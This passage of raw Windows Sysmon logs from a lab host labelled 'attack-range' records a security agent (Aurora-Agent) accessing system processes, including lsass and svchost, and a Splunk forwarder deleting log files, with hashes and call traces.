Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017817Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.770{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017816Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.767{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017815Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.766{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017814Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.765{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017813Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.760{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017812Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.758{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017811Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.754{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017810Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017809Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.744{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017808Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017807Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.737{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017806Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.724{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017805Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.721{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017804Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.702{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017803Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.695{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017802Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.672{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000017801Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.669{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F56FA68023E6C773448B867A624F5729,SHA256=CA6ADE2A6E260569B35CC8B839CC5C6AB60CCA5552627E2E7DD8FEFB514D33FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017800Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.658{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017799Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.648{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017798Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.639{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017797Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.628{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017796Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.588{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017795Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.581{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000045392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:42.271{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30BE10501DBFE4E8D9B12E57220F6910,SHA256=3DADDDDDFE5B4C99D3FB8265C96B54D6B1341DD2BEEFAFB4292F12CCCDC6CF6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017794Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.575{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017793Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.563{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017792Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.555{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017791Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.547{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017790Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.537{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017789Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.534{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000017821Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:43.739{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824321BBC26886107B1B0EF22B72A48C,SHA256=A67B2257DB61584CE98AB49CABDDB08CBE1DB570B85DBA4876413A13A177D473,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:43.350{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EC6FC35C11D3EF8ABC864FCCECD3EC4,SHA256=E0D3699DEF824F9488C123C42F0696BE77B50C09BA7EC089278E440A394CA3F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017822Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:44.825{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 